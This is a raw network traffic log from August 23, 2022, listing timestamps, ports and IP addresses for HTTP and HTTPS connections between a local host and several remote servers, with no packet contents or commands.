Aug 23, 2022 03:43:01.199314117 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.199378967 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.199421883 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.199460983 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.199470997 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.199481010 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.199501038 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.199539900 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.199583054 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.199625015 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.199645996 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.199654102 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.199664116 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.199703932 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.199743986 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.199783087 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.199794054 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.199800968 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.199822903 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.199863911 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.199904919 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.199914932 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.199924946 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.199947119 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.199985981 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.200026035 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.200032949 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.200042963 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.200066090 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.200105906 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.200145960 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.200160980 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.200170994 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.200185061 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.200195074 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.200227022 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.200268030 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.200309992 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.200350046 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.200367928 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.200381041 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.200391054 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.200429916 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.200469971 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.200508118 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.200517893 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.200531006 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.200548887 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.200592995 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.200630903 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.200670004 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.200692892 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.200706959 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.200710058 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.200748920 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.200788975 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.200789928 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.200805902 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.200829029 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.200836897 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.200870037 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.200912952 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.200952053 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.200989962 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.200999975 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.201009989 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.201030970 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.201070070 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.201111078 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.201128960 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.201138020 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.201150894 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.201191902 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.201203108 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.201212883 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.201234102 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.201272964 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.201313019 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.201322079 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.201333046 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.201395988 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.201436043 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.201474905 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.201491117 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.201508999 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.201517105 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.201560974 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.201577902 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.201587915 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.201602936 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.201639891 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.201675892 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.201678991 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.201684952 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.201690912 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.201719046 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.201757908 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.201792002 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.201813936 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.201853991 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.201894045 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.201899052 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.201910019 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.201935053 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.201975107 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.202016115 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.202058077 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.202060938 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.202071905 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.202097893 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.202138901 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.202178955 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.202181101 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.202191114 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.202220917 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.202261925 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.202301979 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.202342033 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.202348948 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.202358007 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.202384949 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.202425003 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.202482939 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.202491999 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.202843904 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.202883959 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.202924013 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.202944040 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.202958107 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.202965975 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.203005075 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.203013897 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.203022957 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.203047037 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.203088045 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.203088999 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.203099012 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.203133106 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.203176975 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.203182936 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.203217983 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.203260899 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.203285933 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.203303099 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.203345060 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.203382015 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.203413010 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.203428030 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.203457117 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.203499079 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.203542948 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.203586102 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.203600883 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.203618050 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.203627110 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.203668118 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.203710079 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.203711033 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.203751087 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.203792095 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.203794003 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.203804016 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.203836918 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.203861952 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.203879118 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.203908920 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.203922987 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.203953028 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.203993082 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.204034090 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.204057932 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.204068899 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.204070091 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.204088926 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.204097986 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.204107046 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.204125881 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.204125881 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.204144001 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.204161882 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.204173088 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.204180002 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.204184055 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.204197884 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.204212904 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.204219103 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.204221964 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.204236031 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.204257011 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.204268932 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.204281092 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.229986906 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.230020046 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.230104923 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.230130911 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.230175018 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.230226040 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.230236053 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.230287075 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.230314970 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.230340958 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.230367899 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.230392933 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.230420113 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.230535984 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.230573893 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.230582952 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.230591059 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.230598927 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.230778933 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.230835915 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.230851889 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.230864048 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.230890989 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.230916023 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.230917931 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.230931997 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.230941057 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.230943918 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.230971098 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.230979919 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.231417894 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.231544971 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.231622934 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.231642962 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.233388901 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.233443022 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.233469009 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.233495951 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.233504057 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.233521938 CEST	80	49812	135.181.104.248	192.168.2.3
Aug 23, 2022 03:43:01.233555079 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.233572006 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.234253883 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.752971888 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:01.755404949 CEST	49812	80	192.168.2.3	135.181.104.248
Aug 23, 2022 03:43:02.463953972 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:43:02.464092970 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:43:20.541166067 CEST	443	49783	148.251.234.83	192.168.2.3
Aug 23, 2022 03:43:20.541306019 CEST	443	49783	148.251.234.83	192.168.2.3
Aug 23, 2022 03:43:20.541980028 CEST	49783	443	192.168.2.3	148.251.234.83
Aug 23, 2022 03:43:21.578710079 CEST	49783	443	192.168.2.3	148.251.234.83
Aug 23, 2022 03:43:21.578746080 CEST	443	49783	148.251.234.83	192.168.2.3
Aug 23, 2022 03:43:24.472130060 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:43:24.472196102 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:43:24.507205963 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:43:24.507260084 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:43:24.599056005 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:43:24.599313021 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:43:25.566368103 CEST	49753	443	192.168.2.3	8.8.4.4
Aug 23, 2022 03:43:25.566395998 CEST	443	49753	8.8.4.4	192.168.2.3
Aug 23, 2022 03:43:32.731324911 CEST	49848	443	192.168.2.3	8.8.4.4
Aug 23, 2022 03:43:32.731381893 CEST	443	49848	8.8.4.4	192.168.2.3
Aug 23, 2022 03:43:32.731558084 CEST	49848	443	192.168.2.3	8.8.4.4
Aug 23, 2022 03:43:32.733750105 CEST	49848	443	192.168.2.3	8.8.4.4
Aug 23, 2022 03:43:32.733781099 CEST	443	49848	8.8.4.4	192.168.2.3
Aug 23, 2022 03:43:32.781896114 CEST	443	49848	8.8.4.4	192.168.2.3
Aug 23, 2022 03:43:32.804239988 CEST	49848	443	192.168.2.3	8.8.4.4
Aug 23, 2022 03:43:32.804275990 CEST	443	49848	8.8.4.4	192.168.2.3
Aug 23, 2022 03:43:32.805166960 CEST	443	49848	8.8.4.4	192.168.2.3
Aug 23, 2022 03:43:32.806098938 CEST	49848	443	192.168.2.3	8.8.4.4
Aug 23, 2022 03:43:32.806123018 CEST	49848	443	192.168.2.3	8.8.4.4
Aug 23, 2022 03:43:32.806301117 CEST	443	49848	8.8.4.4	192.168.2.3
Aug 23, 2022 03:43:32.840914011 CEST	443	49848	8.8.4.4	192.168.2.3
Aug 23, 2022 03:43:32.841171026 CEST	49848	443	192.168.2.3	8.8.4.4
Aug 23, 2022 03:43:32.848323107 CEST	49848	443	192.168.2.3	8.8.4.4
Aug 23, 2022 03:43:32.848354101 CEST	443	49848	8.8.4.4	192.168.2.3
Aug 23, 2022 03:43:32.848916054 CEST	49849	443	192.168.2.3	142.251.209.35
Aug 23, 2022 03:43:32.848984003 CEST	443	49849	142.251.209.35	192.168.2.3
Aug 23, 2022 03:43:32.849075079 CEST	49849	443	192.168.2.3	142.251.209.35
Aug 23, 2022 03:43:32.849257946 CEST	49849	443	192.168.2.3	142.251.209.35
Aug 23, 2022 03:43:32.849277973 CEST	443	49849	142.251.209.35	192.168.2.3
Aug 23, 2022 03:43:32.908806086 CEST	443	49849	142.251.209.35	192.168.2.3
Aug 23, 2022 03:43:32.921135902 CEST	49849	443	192.168.2.3	142.251.209.35
Aug 23, 2022 03:43:32.921189070 CEST	443	49849	142.251.209.35	192.168.2.3
Aug 23, 2022 03:43:32.924582005 CEST	443	49849	142.251.209.35	192.168.2.3
Aug 23, 2022 03:43:32.924700022 CEST	49849	443	192.168.2.3	142.251.209.35
Aug 23, 2022 03:43:33.112860918 CEST	49849	443	192.168.2.3	142.251.209.35
Aug 23, 2022 03:43:33.113112926 CEST	49849	443	192.168.2.3	142.251.209.35
Aug 23, 2022 03:43:33.113136053 CEST	443	49849	142.251.209.35	192.168.2.3
Aug 23, 2022 03:43:33.113162994 CEST	49849	443	192.168.2.3	142.251.209.35
Aug 23, 2022 03:43:33.113167048 CEST	443	49849	142.251.209.35	192.168.2.3
Aug 23, 2022 03:43:33.113332987 CEST	443	49849	142.251.209.35	192.168.2.3
Aug 23, 2022 03:43:33.181678057 CEST	443	49849	142.251.209.35	192.168.2.3
Aug 23, 2022 03:43:33.181715012 CEST	443	49849	142.251.209.35	192.168.2.3
Aug 23, 2022 03:43:33.181801081 CEST	49849	443	192.168.2.3	142.251.209.35
Aug 23, 2022 03:43:33.181832075 CEST	443	49849	142.251.209.35	192.168.2.3
Aug 23, 2022 03:43:33.181930065 CEST	49849	443	192.168.2.3	142.251.209.35
Aug 23, 2022 03:43:33.185234070 CEST	443	49849	142.251.209.35	192.168.2.3
Aug 23, 2022 03:43:33.185280085 CEST	443	49849	142.251.209.35	192.168.2.3
Aug 23, 2022 03:43:33.185334921 CEST	49849	443	192.168.2.3	142.251.209.35
Aug 23, 2022 03:43:33.185476065 CEST	443	49849	142.251.209.35	192.168.2.3
Aug 23, 2022 03:43:33.185549021 CEST	49849	443	192.168.2.3	142.251.209.35
Aug 23, 2022 03:43:33.186624050 CEST	443	49849	142.251.209.35	192.168.2.3
Aug 23, 2022 03:43:33.188033104 CEST	443	49849	142.251.209.35	192.168.2.3
Aug 23, 2022 03:43:33.188055038 CEST	443	49849	142.251.209.35	192.168.2.3
Aug 23, 2022 03:43:33.188127995 CEST	49849	443	192.168.2.3	142.251.209.35
Aug 23, 2022 03:43:33.188164949 CEST	443	49849	142.251.209.35	192.168.2.3
Aug 23, 2022 03:43:33.188256979 CEST	49849	443	192.168.2.3	142.251.209.35
Aug 23, 2022 03:43:33.189114094 CEST	443	49849	142.251.209.35	192.168.2.3
Aug 23, 2022 03:43:33.201241970 CEST	443	49849	142.251.209.35	192.168.2.3
Aug 23, 2022 03:43:33.201345921 CEST	49849	443	192.168.2.3	142.251.209.35
Aug 23, 2022 03:43:33.201380968 CEST	443	49849	142.251.209.35	192.168.2.3
Aug 23, 2022 03:43:33.201543093 CEST	443	49849	142.251.209.35	192.168.2.3
Aug 23, 2022 03:43:33.201725960 CEST	49849	443	192.168.2.3	142.251.209.35
Aug 23, 2022 03:43:33.201738119 CEST	443	49849	142.251.209.35	192.168.2.3
Aug 23, 2022 03:43:33.202995062 CEST	443	49849	142.251.209.35	192.168.2.3
Aug 23, 2022 03:43:33.203111887 CEST	49849	443	192.168.2.3	142.251.209.35
Aug 23, 2022 03:43:33.203134060 CEST	443	49849	142.251.209.35	192.168.2.3
Aug 23, 2022 03:43:33.204493046 CEST	443	49849	142.251.209.35	192.168.2.3
Aug 23, 2022 03:43:33.204590082 CEST	49849	443	192.168.2.3	142.251.209.35
Aug 23, 2022 03:43:33.204607010 CEST	443	49849	142.251.209.35	192.168.2.3
Aug 23, 2022 03:43:33.206090927 CEST	443	49849	142.251.209.35	192.168.2.3
Aug 23, 2022 03:43:33.206192017 CEST	49849	443	192.168.2.3	142.251.209.35
Aug 23, 2022 03:43:33.210761070 CEST	49849	443	192.168.2.3	142.251.209.35
Aug 23, 2022 03:43:33.210808039 CEST	443	49849	142.251.209.35	192.168.2.3
Aug 23, 2022 03:43:35.109451056 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:43:35.109929085 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:43:35.143556118 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:43:35.143598080 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:43:35.143624067 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:43:35.143733978 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:43:35.143742085 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:43:35.143904924 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:43:35.144037008 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:43:35.144110918 CEST	49774	80	192.168.2.3	45.95.11.158
Aug 23, 2022 03:43:35.145771980 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:43:35.145801067 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:43:35.145828009 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:43:35.145845890 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:43:35.178106070 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:43:35.178152084 CEST	80	49774	45.95.11.158	192.168.2.3
Aug 23, 2022 03:43:35.178180933 CEST	80	49774	45.95.11.158	192.168.2.3
